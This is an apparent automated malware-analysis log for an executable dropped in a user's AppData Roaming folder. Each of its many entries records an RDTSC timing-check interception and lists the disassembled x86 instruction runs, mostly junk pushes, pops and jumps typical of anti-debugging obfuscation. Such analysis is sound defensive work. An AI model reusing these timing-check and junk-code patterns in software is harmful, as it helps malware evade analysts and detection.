Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E4017C second address: 4E4019F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F0E948C9FC4h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B5D second address: 4E60B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B63 second address: 4E60B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B67 second address: 4E60B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B6B second address: 4E60B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F0E948C9FC2h 0x0000000f pop edi 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0E948C9FC3h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B9F second address: 4E60BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60BC4 second address: 4E60BD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60BD7 second address: 4E60BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 72h 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E6076F second address: 4E6077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60676 second address: 4E6068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E6068C second address: 4E606D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov edx, 397F1680h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E948C9FC2h 0x00000015 xor si, 34C8h 0x0000001a jmp 00007F0E948C9FBBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov di, si 0x0000002a jmp 00007F0E948C9FBAh 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E6046C second address: 4E604A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E94F51A55h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E604A0 second address: 4E604A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E604A6 second address: 4E604C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E604C5 second address: 4E604C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70121 second address: 4E70125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70125 second address: 4E70142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70142 second address: 4E70163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E94F51A52h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70163 second address: 4E7017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E7017A second address: 4E7017E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E7017E second address: 4E70182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70182 second address: 4E70188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0DEF second address: 4EA0E34 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E948C9FC8h 0x00000008 add ch, 00000028h 0x0000000b jmp 00007F0E948C9FBBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F0E948C9FC6h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0E34 second address: 4EA0E8A instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F0E94F51A4Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F0E94F51A50h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E94F51A4Dh 0x0000001f and si, AE56h 0x00000024 jmp 00007F0E94F51A51h 0x00000029 popfd 0x0000002a mov eax, 4261EBC7h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E801FC second address: 4E8025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E948C9FC1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, dx 0x00000016 pushfd 0x00000017 jmp 00007F0E948C9FBFh 0x0000001c xor eax, 71CF5DBEh 0x00000022 jmp 00007F0E948C9FC9h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E8025B second address: 4E80260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80260 second address: 4E80294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0E948C9FBDh 0x0000000a add si, E7F6h 0x0000000f jmp 00007F0E948C9FC1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80294 second address: 4E80298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80298 second address: 4E8029E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E8029E second address: 4E802A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E802A4 second address: 4E80302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c jmp 00007F0E948C9FC6h 0x00000011 popad 0x00000012 and dword ptr [eax], 00000000h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0E948C9FBAh 0x0000001c sbb eax, 2055C2A8h 0x00000022 jmp 00007F0E948C9FBBh 0x00000027 popfd 0x00000028 mov edx, eax 0x0000002a popad 0x0000002b and dword ptr [eax+04h], 00000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0E948C9FC1h 0x00000036 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605B9 second address: 4E605BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605BD second address: 4E605C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605C1 second address: 4E605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605C7 second address: 4E605CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605CD second address: 4E605D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605D1 second address: 4E605F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E948C9FC2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605F0 second address: 4E605F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605F4 second address: 4E605FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605FA second address: 4E6065C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0E94F51A52h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F0E94F51A50h 0x00000018 mov ebp, esp 0x0000001a jmp 00007F0E94F51A50h 0x0000001f pop ebp 0x00000020 pushad 0x00000021 pushad 0x00000022 mov dh, al 0x00000024 mov cx, dx 0x00000027 popad 0x00000028 call 00007F0E94F51A55h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70C81 second address: 4E70C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70C93 second address: 4E70C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70C97 second address: 4E70CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E948C9FBCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E948C9FBAh 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70CBD second address: 4E70CCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70CCC second address: 4E70D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F0E948C9FBEh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 mov edi, eax 0x00000015 jmp 00007F0E948C9FC8h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80068 second address: 4E80080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A54h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80080 second address: 4E800E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edi, 69104580h 0x00000010 jmp 00007F0E948C9FC9h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F0E948C9FC3h 0x00000020 and eax, 38C36A0Eh 0x00000026 jmp 00007F0E948C9FC9h 0x0000002b popfd 0x0000002c mov ah, A3h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E800E5 second address: 4E800EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E800EB second address: 4E800EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0624 second address: 4EA0649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A4Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0649 second address: 4EA0707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E948C9FC7h 0x00000009 xor al, 0000007Eh 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 popfd 0x00000012 mov bh, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push esi 0x0000001a mov eax, edi 0x0000001c pop edi 0x0000001d mov di, si 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F0E948C9FBAh 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov bx, 06C0h 0x0000002e popad 0x0000002f push ecx 0x00000030 jmp 00007F0E948C9FC4h 0x00000035 mov dword ptr [esp], ecx 0x00000038 pushad 0x00000039 movzx esi, di 0x0000003c pushfd 0x0000003d jmp 00007F0E948C9FC3h 0x00000042 adc cx, 1D4Eh 0x00000047 jmp 00007F0E948C9FC9h 0x0000004c popfd 0x0000004d popad 0x0000004e mov eax, dword ptr [76FA65FCh] 0x00000053 pushad 0x00000054 call 00007F0E948C9FBCh 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0707 second address: 4EA077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0E94F51A51h 0x0000000a popad 0x0000000b test eax, eax 0x0000000d jmp 00007F0E94F51A4Eh 0x00000012 je 00007F0F06FD4C7Eh 0x00000018 pushad 0x00000019 jmp 00007F0E94F51A4Eh 0x0000001e pushad 0x0000001f mov dx, cx 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 popad 0x00000027 mov ecx, eax 0x00000029 pushad 0x0000002a pushad 0x0000002b mov cx, di 0x0000002e jmp 00007F0E94F51A57h 0x00000033 popad 0x00000034 mov si, 95EFh 0x00000038 popad 0x00000039 xor eax, dword ptr [ebp+08h] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push ecx 0x00000040 pop ebx 0x00000041 mov ah, D8h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA077B second address: 4EA0842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d mov dl, ah 0x0000000f pushfd 0x00000010 jmp 00007F0E948C9FC3h 0x00000015 jmp 00007F0E948C9FC3h 0x0000001a popfd 0x0000001b popad 0x0000001c ror eax, cl 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0E948C9FC4h 0x00000025 add esi, 5147D008h 0x0000002b jmp 00007F0E948C9FBBh 0x00000030 popfd 0x00000031 jmp 00007F0E948C9FC8h 0x00000036 popad 0x00000037 leave 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F0E948C9FBEh 0x0000003f add esi, 5754C598h 0x00000045 jmp 00007F0E948C9FBBh 0x0000004a popfd 0x0000004b mov dx, si 0x0000004e popad 0x0000004f retn 0004h 0x00000052 nop 0x00000053 mov esi, eax 0x00000055 lea eax, dword ptr [ebp-08h] 0x00000058 xor esi, dword ptr [00AB2014h] 0x0000005e push eax 0x0000005f push eax 0x00000060 push eax 0x00000061 lea eax, dword ptr [ebp-10h] 0x00000064 push eax 0x00000065 call 00007F0E98CFA7F3h 0x0000006a push FFFFFFFEh 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F0E948C9FC1h 0x00000073 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0842 second address: 4EA0867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A4Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0867 second address: 4EA0886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ret 0x0000000b nop 0x0000000c push eax 0x0000000d call 00007F0E98CFA831h 0x00000012 mov edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0E948C9FC0h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0886 second address: 4EA0898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0898 second address: 4EA089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA089C second address: 4EA08BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E94F51A53h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5002E second address: 4E500AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 and ch, 0000000Eh 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0E948C9FC0h 0x00000018 sub ax, 1388h 0x0000001d jmp 00007F0E948C9FBBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ch, bh 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007F0E948C9FBAh 0x00000036 jmp 00007F0E948C9FC5h 0x0000003b popfd 0x0000003c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E500AE second address: 4E5013B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 6E5055D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007F0E94F51A58h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 movsx ebx, cx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov dx, ax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0E94F51A50h 0x00000025 and ax, 2DD8h 0x0000002a jmp 00007F0E94F51A4Bh 0x0000002f popfd 0x00000030 jmp 00007F0E94F51A58h 0x00000035 popad 0x00000036 popad 0x00000037 and esp, FFFFFFF8h 0x0000003a jmp 00007F0E94F51A50h 0x0000003f xchg eax, ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov edi, 0C56B380h 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5013B second address: 4E50141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50141 second address: 4E50145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50145 second address: 4E50162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, cl 0x00000011 push edi 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50162 second address: 4E50168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50168 second address: 4E5016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5016C second address: 4E5017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5017B second address: 4E50181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50181 second address: 4E501DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F0E94F51A50h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F0E94F51A57h 0x00000019 add ecx, 2B0072CEh 0x0000001f jmp 00007F0E94F51A59h 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E501DE second address: 4E501FD instructions: 0x00000000 rdtsc 0x00000002 call 00007F0E948C9FC0h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, edi 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 rdtsc
